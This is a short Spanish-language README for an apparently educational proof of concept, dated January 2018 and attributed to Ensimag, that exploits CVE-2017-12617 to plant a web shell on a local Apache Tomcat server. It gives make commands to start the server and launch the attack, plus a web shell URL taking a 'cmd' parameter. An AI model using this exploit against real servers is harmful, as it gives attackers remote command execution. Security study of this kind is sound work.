
Prueba de Concepto - Explotación de RCE: Web Shell en Apache Tomcat - Ensimag Enero 2018
El propósito de esta Prueba de Concepto es demostrar cómo es posible usar la vulnerabilidad CVE-2017-12617 para tener control remoto sobre un servidor Apache Tomcat.
make server_up
make attack
Si este comando no abre su navegador, puede ir a:
http://localhost:8080/web_shell.jsp?cmd=pwd
Ahora tendrá acceso a una web shell en el servidor, directamente en su navegador.
Si tiene algún problema para ejecutar esta Prueba de Concepto, por favor cree un issue en: https://github.com/ygouzerh/CVE-2017-12617/issues , haremos todo lo posible por responderle lo antes posible.